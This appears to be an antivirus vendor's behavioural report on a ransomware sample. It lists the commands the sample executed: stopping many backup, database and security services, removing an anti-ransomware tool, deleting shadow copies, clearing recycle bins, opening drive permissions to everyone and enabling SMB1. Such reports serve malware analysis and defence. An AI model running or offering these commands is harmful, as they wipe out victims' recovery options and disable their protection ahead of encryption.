Trojan.Encoder.33405

Technical Information

To ensure autorun and distribution

Creates or modifies the following files

%APPDATA%\microsoft\windows\start menu\programs\startup\mystartup.lnk

Sets the following service settings

[<HKLM>\System\CurrentControlSet\Services\upnphost] 'Start' = '00000002'
[<HKLM>\System\CurrentControlSet\Services\SSDPSRV] 'Start' = '00000002'
[<HKLM>\System\CurrentControlSet\Services\Dnscache] 'Start' = '00000002'
[<HKLM>\System\CurrentControlSet\Services\FDResPub] 'Start' = '00000002'

Malicious functions

Executes the following

'%WINDIR%\syswow64\taskkill.exe' /F /IM RaccineSettings.exe
'%WINDIR%\syswow64\net.exe' stop SQLAgent$BKUPEXEC /y
'%WINDIR%\syswow64\net.exe' stop sms_site_sql_backup /y
'%WINDIR%\syswow64\net.exe' stop mfevtp /y
'%WINDIR%\syswow64\net.exe' stop RESvc /y
'%WINDIR%\syswow64\net.exe' stop wbengine /y
'%WINDIR%\syswow64\net.exe' stop mfemms /y
'%WINDIR%\syswow64\net.exe' stop mfefire /y
'%WINDIR%\syswow64\net.exe' stop SQLAgent$CITRIX_METAFRAME /y
'%WINDIR%\syswow64\net.exe' stop sacsvr /y
'%WINDIR%\syswow64\net.exe' stop SQLAgent$CXDB /y
'%WINDIR%\syswow64\net.exe' stop SAVAdminService /y
'%WINDIR%\syswow64\net.exe' stop SQLAgent$ECWDB2 /y
'%WINDIR%\syswow64\net.exe' stop OracleClientCache80 /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$SOPHOS /y
'%WINDIR%\syswow64\net.exe' stop SAVService /y
'%WINDIR%\syswow64\net.exe' stop SQLAgent$PRACTTICEMGT /y
'%WINDIR%\syswow64\net.exe' stop ShMonitor /y
'%WINDIR%\syswow64\net.exe' stop SQLAgent$PROD /y
'%WINDIR%\syswow64\net.exe' stop Smcinst /y
'%WINDIR%\syswow64\net.exe' stop SQLAgent$PROFXENGAGEMENT /y
'%WINDIR%\syswow64\net.exe' stop SmcService /y
'%WINDIR%\syswow64\net.exe' stop SQLAgent$SBSMONITORING /y
'%WINDIR%\syswow64\net.exe' stop SntpService /y
'%WINDIR%\syswow64\net.exe' stop SQLAgent$SHAREPOINT /y
'%WINDIR%\syswow64\net.exe' stop sophossps /y
'%WINDIR%\syswow64\net.exe' stop SQLAgent$SQL_2008 /y
'%WINDIR%\syswow64\net.exe' stop SQLAgent$SOPHOS /y
'%WINDIR%\syswow64\net.exe' stop SQLAgent$PRACTTICEBGC /y
'%WINDIR%\syswow64\net.exe' stop SepMasterService /y
'%WINDIR%\syswow64\net.exe' stop McTaskManager /y
'%WINDIR%\syswow64\net.exe' stop MySQL80 /y
'%WINDIR%\syswow64\net.exe' stop VeeamRESTSvc /y
'%WINDIR%\syswow64\net.exe' stop VeeamBackupSvc /y
'%WINDIR%\syswow64\net.exe' stop MSSQLFDLauncher$SHAREPOINT /y
'%WINDIR%\syswow64\net.exe' stop kavfsslp /y
'%WINDIR%\syswow64\net.exe' stop VeeamBrokerSvc /y
'%WINDIR%\syswow64\net.exe' stop MSSQLFDLauncher$SQL_2008 /y
'%WINDIR%\syswow64\net.exe' stop klnagent /y
'%WINDIR%\syswow64\net.exe' stop VeeamCatalogSvc /y
'%WINDIR%\syswow64\net.exe' stop MSSQLFDLauncher$SYSTEM_BGC /y
'%WINDIR%\syswow64\net.exe' stop macmnsvc /y
'%WINDIR%\syswow64\net.exe' stop VeeamEnterpriseManagerSvc /y
'%WINDIR%\syswow64\net.exe' stop MBEndpointAgent /y
'%WINDIR%\syswow64\net.exe' stop MSSQLSERVER /y
'%WINDIR%\syswow64\net.exe' stop VeeamDeploySvc /y
'%WINDIR%\syswow64\net.exe' stop KAVFSGT /y
'%WINDIR%\syswow64\net.exe' stop MBAMService /y
'%WINDIR%\syswow64\net.exe' stop masvc /y
'%WINDIR%\syswow64\net.exe' stop MSSQLFDLauncher$TPS /y
'%WINDIR%\syswow64\net.exe' stop VeeamCloudSvc /y
'%WINDIR%\syswow64\net.exe' stop MSSQLServerADHelper /y
'%WINDIR%\syswow64\net.exe' stop McAfeeEngineService /y
'%WINDIR%\syswow64\net.exe' stop VeeamHvIntegrationSvc /y
'%WINDIR%\syswow64\net.exe' stop MSSQLServerADHelper100 /y
'%WINDIR%\syswow64\net.exe' stop McAfeeFramework /y
'%WINDIR%\syswow64\net.exe' stop VeeamMountSvc /y
'%WINDIR%\syswow64\net.exe' stop MSSQLServerOLAPService /y
'%WINDIR%\syswow64\net.exe' stop McAfeeFrameworkMcAfeeFramework /y
'%WINDIR%\syswow64\net.exe' stop MySQL57 /y
'%WINDIR%\syswow64\net.exe' stop McShield /y
'%WINDIR%\syswow64\net.exe' stop MSSQLFDLauncher$TPSAMA /y
'%WINDIR%\syswow64\net.exe' stop swi_filter /y
'%WINDIR%\syswow64\net.exe' stop svcGenericHost /y
'%WINDIR%\syswow64\taskkill.exe' /IM sqlservr.exe /F
'%WINDIR%\syswow64\net.exe' stop SQLAgent$SQLEXPRESS /y
'%WINDIR%\syswow64\taskkill.exe' /IM thebat64.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM ocomm.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM infopath.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM mbamtray.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM zoolz.exe /F
'%WINDIR%\syswow64\taskkill.exe' IM thunderbird.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM dbsnmp.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM xfssvccon.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM Ntrtscan.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM isqlplussvc.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM onenote.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM PccNTMon.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM tbirdconfig.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM dbeng50.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM msaccess.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM msftesql.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM powerpnt.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM visio.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM winword.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM mysqld-nt.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM wordpad.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM mysqld-opt.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM ocautoupds.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM ocssd.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM oracle.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM sqlagent.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM sqlbrowser.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM outlook.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM tmlisten.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM sqlwriter.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM CNTAoSMgr.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM excel.exe /F
'%WINDIR%\syswow64\net.exe' stop SQLAgent$TPSAMA /y
'%WINDIR%\syswow64\net.exe' stop swi_update /y
'%WINDIR%\syswow64\net.exe' stop swi_update_64 /y
'%WINDIR%\syswow64\net.exe' stop SQLAgent$VEEAMSQL2012 /y
'%WINDIR%\syswow64\net.exe' stop TmCCSF /y
'%WINDIR%\syswow64\net.exe' stop SQLBrowser /y
'%WINDIR%\syswow64\net.exe' stop tmlisten /y
'%WINDIR%\syswow64\net.exe' stop SQLSafeOLRService /y
'%WINDIR%\syswow64\net.exe' stop TrueKey /y
'%WINDIR%\syswow64\net.exe' stop SQLSERVERAGENT /y
'%WINDIR%\syswow64\net.exe' stop TrueKeyScheduler /y
'%WINDIR%\syswow64\net.exe' stop SQLTELEMETRY /y
'%WINDIR%\syswow64\net.exe' stop TrueKeyServiceHelper /y
'%WINDIR%\syswow64\net.exe' stop SQLAgent$TPS /y
'%WINDIR%\syswow64\net.exe' stop SQLTELEMETRY$ECWDB2 /y
'%WINDIR%\syswow64\net.exe' stop mssql$vim_sqlexp /y
'%WINDIR%\syswow64\net.exe' stop vapiendpoint /y
'%WINDIR%\syswow64\net.exe' stop swi_service /y
'%WINDIR%\syswow64\taskkill.exe' /IM mspub.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM mydesktopqos.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM mydesktopservice.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM mysqld.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM sqbcoreservice.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM firefoxconfig.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM agntsvc.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM thebat.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM steam.exe /F
'%WINDIR%\syswow64\taskkill.exe' /IM encsvc.exe /F
'%WINDIR%\syswow64\net.exe' stop WRSVC /y
'%WINDIR%\syswow64\net.exe' stop MSSQLFDLauncher$SBSMONITORING /y
'%WINDIR%\syswow64\net.exe' stop SQLAgent$SYSTEM_BGC /y
'%WINDIR%\syswow64\net.exe' stop ESHASRV /y
'%WINDIR%\syswow64\net.exe' stop MSExchangeMTA /y
'%WINDIR%\syswow64\net.exe' stop AcronisAgent /y
'%WINDIR%\syswow64\net.exe' stop CASAD2DWebSvc /y
'%WINDIR%\syswow64\net.exe' stop CAARCUpdateSvc /y
'%WINDIR%\syswow64\net.exe' stop sophos /y
'%WINDIR%\syswow64\net.exe' stop “Acronis VSS Provider” /y
'%WINDIR%\syswow64\net.exe' stop MsDtsServer /y
'%WINDIR%\syswow64\net.exe' stop IISAdmin /y
'%WINDIR%\syswow64\net.exe' stop MSExchangeES /y
'%WINDIR%\syswow64\net.exe' stop SamSs /y
'%WINDIR%\syswow64\net.exe' stop “Sophos AutoUpdate Service” /y
'%WINDIR%\syswow64\net.exe' stop MSExchangeIS /y
'%WINDIR%\syswow64\net.exe' stop NetMsmqActivator /y
'%WINDIR%\syswow64\net.exe' stop BackupExecRPCService /y
'%WINDIR%\syswow64\net.exe' stop AcrSch2Svc /y
'%WINDIR%\syswow64\net.exe' stop MsDtsServer100 /y
'%WINDIR%\syswow64\net.exe' stop EraserSvc11710 /y
'%WINDIR%\syswow64\net.exe' stop “Sophos Agent” /y
'%WINDIR%\syswow64\net.exe' stop ReportServer /y
'%WINDIR%\syswow64\net.exe' stop “SQLsafe Backup Service” /y
'%WINDIR%\syswow64\net.exe' stop MsDtsServer110 /y
'%WINDIR%\syswow64\net.exe' stop POP3Svc /y
'%WINDIR%\syswow64\net.exe' stop MSExchangeMGMT /y
'%WINDIR%\syswow64\net.exe' stop “Sophos Clean Service” /y
'%WINDIR%\syswow64\net.exe' stop SMTPSvc /y
'%WINDIR%\syswow64\net.exe' stop ReportServer$SQL_2008 /y
'%WINDIR%\syswow64\net.exe' stop “SQLsafe Filter Service” /y
'%WINDIR%\syswow64\net.exe' stop msftesql$PROD /y
'%WINDIR%\syswow64\net.exe' stop “SQL Backups /y
'%WINDIR%\syswow64\net.exe' stop “Enterprise Client Service” /y
'%WINDIR%\syswow64\net.exe' stop BackupExecManagementService /y
'%WINDIR%\syswow64\net.exe' stop BackupExecJobEngine /y
'%WINDIR%\syswow64\net.exe' stop BackupExecDiveciMediaService /y
'%WINDIR%\syswow64\netsh.exe' advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
'%WINDIR%\syswow64\net.exe' stop NetBackup BMR MTFTP Service /y
'%WINDIR%\syswow64\net.exe' stop BMR Boot Service /y
'%WINDIR%\syswow64\net.exe' stop mfewc /y
'%WINDIR%\syswow64\net.exe' stop McAfeeDLPAgentService /y
'%WINDIR%\syswow64\net.exe' stop avpsus /y
'%WINDIR%\syswow64\net.exe' stop DefWatch /y
'%WINDIR%\syswow64\net.exe' stop ccEvtMgr /y
'%WINDIR%\syswow64\net.exe' stop ccSetMgr /y
'%WINDIR%\syswow64\net.exe' stop SavRoam /y
'%WINDIR%\syswow64\net.exe' stop RTVscan /y
'%WINDIR%\syswow64\net.exe' stop QBFCService /y
'%WINDIR%\syswow64\net.exe' stop QBIDPService /y
'%WINDIR%\syswow64\netsh.exe' advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
'%WINDIR%\syswow64\net.exe' stop Intuit.QuickBooks.FCS /y
'%WINDIR%\syswow64\net.exe' stop YooBackup /y
'%WINDIR%\syswow64\net.exe' stop PDVFSService /y
'%WINDIR%\syswow64\net.exe' stop veeam /y
'%WINDIR%\syswow64\net.exe' stop VeeamNFSSvc /y
'%WINDIR%\syswow64\net.exe' stop VeeamDeploymentService /y
'%WINDIR%\syswow64\net.exe' stop VeeamTransportSvc /y
'%WINDIR%\syswow64\net.exe' stop VSNAPVSS /y
'%WINDIR%\syswow64\net.exe' stop stc_raw_agent /y
'%WINDIR%\syswow64\net.exe' stop zhudongfangyu /y
'%WINDIR%\syswow64\net.exe' stop YooIT /y
'%WINDIR%\syswow64\net.exe' stop BackupExecVSSProvider /y
'%WINDIR%\syswow64\net.exe' stop BackupExecAgentAccelerator /y
'%WINDIR%\syswow64\net.exe' stop BackupExecAgentBrowser /y
'%WINDIR%\syswow64\net.exe' stop QBCFMonitorService /y
'%WINDIR%\syswow64\net.exe' stop SstpSvc /y
'%WINDIR%\syswow64\net.exe' stop “Sophos Device Control Service” /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$VEEAMSQL2012 /y
'%WINDIR%\syswow64\net.exe' stop ReportServer$SYSTEM_BGC /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$PROD /y
'%WINDIR%\syswow64\net.exe' stop “Sophos Web Control Service” /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$PRACTTICEBGC /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$SBSMONITORING /y
'%WINDIR%\syswow64\net.exe' stop AVP /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$SHAREPOINT /y
'%WINDIR%\syswow64\net.exe' stop DCAgent /y
'%WINDIR%\syswow64\net.exe' stop bedbg /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$SQL_2008 /y
'%WINDIR%\syswow64\net.exe' stop EhttpSrv /y
'%WINDIR%\syswow64\net.exe' stop MMS /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$SQLEXPRESS /y
'%WINDIR%\syswow64\net.exe' stop Antivirus /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$PROFXENGAGEMENT /y
'%WINDIR%\syswow64\net.exe' stop ekrn /y
'%WINDIR%\syswow64\net.exe' stop EPSecurityService /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$VEEAMSQL2008R2 /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$TPS /y
'%WINDIR%\syswow64\net.exe' stop EPUpdateService /y
'%WINDIR%\syswow64\net.exe' stop ntrtscan /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$TPSAMA /y
'%WINDIR%\syswow64\net.exe' stop EsgShKernel /y
'%WINDIR%\syswow64\net.exe' stop SQLWriter /y
'%WINDIR%\syswow64\net.exe' stop KAVFS /y
'%WINDIR%\syswow64\net.exe' stop MSSQLFDLauncher$PROFXENGAGEMENT /y
'%WINDIR%\syswow64\net.exe' stop SQLAgent$VEEAMSQL2008R2 /y
'%WINDIR%\syswow64\net.exe' stop FA_Scheduler /y
'%WINDIR%\syswow64\net.exe' stop mozyprobackup /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$SYSTEM_BGC /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$SBSMONITORING /
'%WINDIR%\syswow64\net.exe' stop BackupExecDeviceMediaService /y
'%WINDIR%\syswow64\net.exe' stop “Sophos System Protection Service” /y
'%WINDIR%\syswow64\net.exe' stop MSOLAP$SQL_2008 /y
'%WINDIR%\syswow64\net.exe' stop UI0Detect /y
'%WINDIR%\syswow64\net.exe' stop MSExchangeSA /y
'%WINDIR%\syswow64\net.exe' stop “Sophos File Scanner Service” /y
'%WINDIR%\syswow64\net.exe' stop MSOLAP$TPS /y
'%WINDIR%\syswow64\net.exe' stop “Zoolz 2 Service” /y
'%WINDIR%\syswow64\net.exe' stop ReportServer$TPSAMA /y
'%WINDIR%\syswow64\net.exe' stop “Sophos Health Service” /y
'%WINDIR%\syswow64\net.exe' stop MSExchangeSRS /y
'%WINDIR%\syswow64\net.exe' stop W3Svc /y
'%WINDIR%\syswow64\net.exe' stop MSOLAP$SYSTEM_BGC /y
'%WINDIR%\syswow64\net.exe' stop “Veeam Backup Catalog Data Service” /y
'%WINDIR%\syswow64\net.exe' stop ReportServer$TPS /y
'%WINDIR%\syswow64\net.exe' stop “Symantec System Recovery” /y
'%WINDIR%\syswow64\net.exe' stop “aphidmonitorservice” /y
'%WINDIR%\syswow64\net.exe' stop “Sophos MCS Agent” /y
'%WINDIR%\syswow64\net.exe' stop MSOLAP$TPSAMA /y
'%WINDIR%\syswow64\net.exe' stop “intel(r) proset monitoring service” /y
'%WINDIR%\syswow64\net.exe' stop msexchangeimap4 /y
'%WINDIR%\syswow64\net.exe' stop “Sophos MCS Client” /y
'%WINDIR%\syswow64\net.exe' stop ARSM /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$BKUPEXEC /y
'%WINDIR%\syswow64\net.exe' stop unistoresvc_1af40a /y
'%WINDIR%\syswow64\net.exe' stop “Sophos Message Router” /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$ECWDB2 /y
'%WINDIR%\syswow64\net.exe' stop audioendpointbuilder /y
'%WINDIR%\syswow64\net.exe' stop “Sophos Safestore Service” /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$PRACTICEMGT /y
'%WINDIR%\syswow64\net.exe' stop msexchangeadtopology /y
'%WINDIR%\syswow64\net.exe' stop SDRSVC /y
'%WINDIR%\syswow64\taskkill.exe' /IM synctime.exe /F

Modifies file system

Creates the following files

%TEMP%\restore_files_info.txt

Miscellaneous

Searches for the following windows

ClassName: '' WindowName: ''

Executes the following

'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Get-MpPreference -verbose
'%WINDIR%\syswow64\net1.exe' stop SQLTELEMETRY$ECWDB2 /y
'%WINDIR%\syswow64\net1.exe' stop WRSVC /y
'%WINDIR%\syswow64\net1.exe' stop mssql$vim_sqlexp /y
'%WINDIR%\syswow64\net1.exe' stop vapiendpoint /y
'%WINDIR%\syswow64\net1.exe' stop TrueKeyServiceHelper /y
'%WINDIR%\syswow64\net1.exe' stop “Sophos System Protection Service” /y
'%WINDIR%\syswow64\net1.exe' stop “Sophos Safestore Service” /y
'%WINDIR%\syswow64\net1.exe' stop BackupExecAgentBrowser /y
'%WINDIR%\syswow64\net1.exe' stop sms_site_sql_backup /y
'%WINDIR%\syswow64\net1.exe' stop MSSQL$SBSMONITORING /
'%WINDIR%\syswow64\net1.exe' stop AcrSch2Svc /y
'%WINDIR%\syswow64\net1.exe' stop MSSQL$ECWDB2 /y
'%WINDIR%\syswow64\net1.exe' stop MSSQL$PRACTICEMGT /y
'%WINDIR%\syswow64\net1.exe' stop unistoresvc_1af40a /y
'%WINDIR%\syswow64\net1.exe' stop MSSQL$BKUPEXEC /y
'%WINDIR%\syswow64\net1.exe' stop “Sophos MCS Client” /y
'%WINDIR%\syswow64\net1.exe' stop ARSM /y
'%WINDIR%\syswow64\net1.exe' stop “intel(r) proset monitoring service” /y
'%WINDIR%\syswow64\net1.exe' stop SQLBrowser /y
'%WINDIR%\syswow64\net1.exe' stop SQLTELEMETRY /y
'%WINDIR%\syswow64\net1.exe' stop tmlisten /y
'%WINDIR%\syswow64\net1.exe' stop SQLSafeOLRService /y
'%WINDIR%\syswow64\net1.exe' stop TrueKey /y
'%WINDIR%\syswow64\net1.exe' stop RESvc /y
'%WINDIR%\syswow64\net1.exe' stop VeeamHvIntegrationSvc /y
'%WINDIR%\syswow64\net1.exe' stop McAfeeFramework /y
'%WINDIR%\syswow64\net1.exe' stop MSSQLFDLauncher$TPS /y
'%WINDIR%\syswow64\net1.exe' stop MBEndpointAgent /y
'%WINDIR%\syswow64\net1.exe' stop VeeamEnterpriseManagerSvc /y
'%WINDIR%\syswow64\net1.exe' stop MSSQLServerADHelper /y
'%WINDIR%\syswow64\net1.exe' stop MSSQL$SOPHOS /y
'%WINDIR%\syswow64\net1.exe' stop msexchangeimap4 /y
'%WINDIR%\syswow64\net1.exe' stop MSSQL$PROFXENGAGEMENT /y
'%WINDIR%\syswow64\net1.exe' stop wbengine /y
'%WINDIR%\syswow64\net1.exe' stop mfefire /y
'%WINDIR%\syswow64\net1.exe' stop TmCCSF /y
'%WINDIR%\syswow64\net1.exe' stop SQLAgent$VEEAMSQL2012 /y
'%WINDIR%\syswow64\net1.exe' stop swi_update_64 /y
'%WINDIR%\syswow64\net1.exe' stop SQLAgent$VEEAMSQL2008R2 /y
'%WINDIR%\syswow64\net1.exe' stop swi_update /y
'%WINDIR%\syswow64\net1.exe' stop TrueKeyScheduler /y
'%WINDIR%\syswow64\net1.exe' stop SQLSERVERAGENT /y
'%WINDIR%\syswow64\net1.exe' stop McAfeeEngineService /y
'%WINDIR%\syswow64\net1.exe' stop mfemms /y
'%WINDIR%\syswow64\net1.exe' stop “SQL Backups /y
'%WINDIR%\syswow64\net1.exe' stop AcronisAgent /y
'%WINDIR%\syswow64\net1.exe' stop MSExchangeMGMT /y
'%WINDIR%\syswow64\net1.exe' stop masvc /y
'%WINDIR%\syswow64\net1.exe' stop MSSQLFDLauncher$TPSAMA /y
'%WINDIR%\syswow64\net1.exe' stop MSSQLFDLauncher$PROFXENGAGEMENT /y
'%WINDIR%\syswow64\net1.exe' stop MSSQL$VEEAMSQL2012 /y
'%WINDIR%\syswow64\net1.exe' stop “Sophos Web Control Service” /y
'%WINDIR%\syswow64\net1.exe' stop Antivirus /y
'%WINDIR%\syswow64\net1.exe' stop BackupExecRPCService /y
'%WINDIR%\syswow64\net1.exe' stop BMR Boot Service /y
'%WINDIR%\syswow64\net1.exe' stop SMTPSvc /y
'%WINDIR%\syswow64\net1.exe' stop NetBackup BMR MTFTP Service /y
'%WINDIR%\syswow64\net1.exe' stop mfewc /y
'%WINDIR%\syswow64\net1.exe' stop BackupExecManagementService /y
'%WINDIR%\syswow64\net1.exe' stop BackupExecJobEngine /y
'%WINDIR%\syswow64\net1.exe' stop MSSQL$PRACTTICEBGC /y
'%WINDIR%\syswow64\net1.exe' stop MSSQL$PROD /y
'%WINDIR%\syswow64\net1.exe' stop SAVService /y
'%WINDIR%\syswow64\net1.exe' stop SQLAgent$PRACTTICEMGT /y
'%WINDIR%\syswow64\net1.exe' stop VeeamCloudSvc /y
'%WINDIR%\syswow64\net1.exe' stop “Sophos AutoUpdate Service” /y
'%WINDIR%\syswow64\net1.exe' stop MsDtsServer100 /y
'%WINDIR%\syswow64\net1.exe' stop avpsus /y
'%WINDIR%\syswow64\net1.exe' start upnphost /y
'%WINDIR%\syswow64\net1.exe' stop SDRSVC /y
'%WINDIR%\syswow64\net1.exe' stop “Sophos Message Router” /y
'%WINDIR%\syswow64\net1.exe' stop “SQLsafe Backup Service” /y
'%WINDIR%\syswow64\net1.exe' stop MSOLAP$TPSAMA /y
'%WINDIR%\syswow64\net1.exe' stop msexchangeadtopology /y
'%WINDIR%\syswow64\net1.exe' stop MSExchangeIS /y
'%WINDIR%\syswow64\net1.exe' stop SamSs /y
'%WINDIR%\syswow64\net1.exe' stop VeeamDeploySvc /y
'%WINDIR%\syswow64\net1.exe' stop “Enterprise Client Service” /y
'%WINDIR%\syswow64\net1.exe' stop POP3Svc /y
'%WINDIR%\syswow64\net1.exe' stop MSSQLServerOLAPService /y
'%WINDIR%\syswow64\net1.exe' stop NetMsmqActivator /y
'%WINDIR%\syswow64\net1.exe' stop EraserSvc11710 /y
'%WINDIR%\syswow64\net1.exe' stop MSSQL$VEEAMSQL2008R2 /y
'%WINDIR%\syswow64\net1.exe' stop KAVFS /y
'%WINDIR%\syswow64\net1.exe' stop SQLWriter /y
'%WINDIR%\syswow64\net1.exe' stop MBAMService /y
'%WINDIR%\syswow64\net1.exe' stop MSSQLSERVER /y
'%WINDIR%\syswow64\net1.exe' stop FA_Scheduler /y
'%WINDIR%\syswow64\net1.exe' stop ESHASRV /y
'%WINDIR%\syswow64\net1.exe' stop audioendpointbuilder /y
'%WINDIR%\syswow64\net1.exe' stop “Sophos Agent” /y
'%WINDIR%\syswow64\net1.exe' stop McAfeeDLPAgentService /y
'%WINDIR%\syswow64\net1.exe' stop SQLAgent$ECWDB2 /y
'%WINDIR%\syswow64\net1.exe' stop ntrtscan /y
'%WINDIR%\syswow64\net1.exe' stop YooBackup /y
'%WINDIR%\syswow64\net1.exe' stop EhttpSrv /y
'%WINDIR%\syswow64\net1.exe' stop SQLAgent$PROD /y
'%WINDIR%\syswow64\net1.exe' stop “Sophos Device Control Service” /y
'%WINDIR%\syswow64\net1.exe' stop msftesql$PROD /y
'%WINDIR%\syswow64\net1.exe' stop SstpSvc /y
'%WINDIR%\syswow64\net1.exe' stop SQLAgent$CXDB /y
'%WINDIR%\syswow64\net1.exe' stop MSSQL$SYSTEM_BGC /y
'%WINDIR%\syswow64\net.exe' start FDResPub /y
'%WINDIR%\syswow64\net1.exe' stop BackupExecAgentAccelerator /y
'%WINDIR%\syswow64\net1.exe' stop MSExchangeMTA /y
'%WINDIR%\syswow64\net1.exe' stop “Symantec System Recovery” /y
'%WINDIR%\syswow64\net1.exe' stop ReportServer$SYSTEM_BGC /y
'%WINDIR%\syswow64\net1.exe' stop ReportServer$TPS /y
'%WINDIR%\syswow64\net1.exe' stop W3Svc /y
'%WINDIR%\syswow64\net1.exe' stop “Veeam Backup Catalog Data Service” /y
'%WINDIR%\syswow64\net1.exe' stop QBFCService /y
'%WINDIR%\syswow64\net1.exe' stop “Zoolz 2 Service” /y
'%WINDIR%\syswow64\icacls.exe' "Z:*" /grant Everyone:F /T /C /Q
'%WINDIR%\syswow64\arp.exe' -a
'%WINDIR%\syswow64\icacls.exe' "D:*" /grant Everyone:F /T /C /Q
'%WINDIR%\syswow64\icacls.exe' "C:*" /grant Everyone:F /T /C /Q
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
'%WINDIR%\syswow64\reg.exe' delete HKCU\Software\Raccine /F
'%WINDIR%\syswow64\schtasks.exe' /DELETE /TN "Raccine Rules Updater" /F
'%WINDIR%\syswow64\cmd.exe' /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
'%WINDIR%\syswow64\cmd.exe' /c rd /s /q D:\\$Recycle.bin
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
'%WINDIR%\syswow64\cmd.exe' /c net view
'%WINDIR%\syswow64\net.exe' view
'%WINDIR%\syswow64\sc.exe' config Dnscache start= auto
'%WINDIR%\syswow64\net1.exe' stop MSExchangeSRS /y
'%WINDIR%\syswow64\net1.exe' stop SQLAgent$PRACTTICEBGC /y
'%WINDIR%\syswow64\sc.exe' config FDResPub start= auto
'%WINDIR%\syswow64\sc.exe' config SstpSvc start= disabled
'%WINDIR%\syswow64\sc.exe' config SQLWriter start= disabled
'%WINDIR%\syswow64\sc.exe' config SQLTELEMETRY$ECWDB2 start= disabled
'%WINDIR%\syswow64\sc.exe' config SQLTELEMETRY start= disabled
'%WINDIR%\syswow64\sc.exe' config upnphost start= auto
'%WINDIR%\syswow64\sc.exe' config SSDPSRV start= auto
'%WINDIR%\syswow64\net.exe' start upnphost /y
'%WINDIR%\syswow64\net.exe' start SSDPSRV /y
'%WINDIR%\syswow64\reg.exe' delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
'%WINDIR%\syswow64\net.exe' start Dnscache /y
'%WINDIR%\syswow64\net1.exe' stop VSNAPVSS /y
'%WINDIR%\syswow64\net1.exe' stop swi_service /y
'%WINDIR%\syswow64\net1.exe' stop MSOLAP$SQL_2008 /y
'%WINDIR%\syswow64\net1.exe' start Dnscache /y
'%WINDIR%\syswow64\net1.exe' stop ShMonitor /y
'%WINDIR%\syswow64\net1.exe' stop EPUpdateService /y
'%WINDIR%\syswow64\net1.exe' start FDResPub /y
'%WINDIR%\syswow64\net1.exe' stop veeam /y
'%WINDIR%\syswow64\net1.exe' stop sophossps /y
'%WINDIR%\syswow64\net1.exe' stop Intuit.QuickBooks.FCS /y
'%WINDIR%\syswow64\net1.exe' stop VeeamNFSSvc /y
'%WINDIR%\syswow64\net1.exe' stop MSExchangeSA /y
'%WINDIR%\syswow64\net1.exe' stop MSSQL$TPSAMA /y
'%WINDIR%\syswow64\net1.exe' stop PDVFSService /y
'%WINDIR%\syswow64\net1.exe' stop SQLAgent$TPSAMA /y
'%WINDIR%\syswow64\net1.exe' stop QBCFMonitorService /y
'%WINDIR%\syswow64\net1.exe' stop sacsvr /y
'%WINDIR%\syswow64\net1.exe' stop SQLAgent$SQLEXPRESS /y
'%WINDIR%\syswow64\net1.exe' stop swi_filter /y
'%WINDIR%\syswow64\net1.exe' stop svcGenericHost /y
'%WINDIR%\syswow64\net1.exe' stop SQLAgent$SYSTEM_BGC /y
'%WINDIR%\syswow64\net1.exe' stop “SQLsafe Filter Service” /y
'%WINDIR%\syswow64\net1.exe' stop VeeamTransportSvc /y
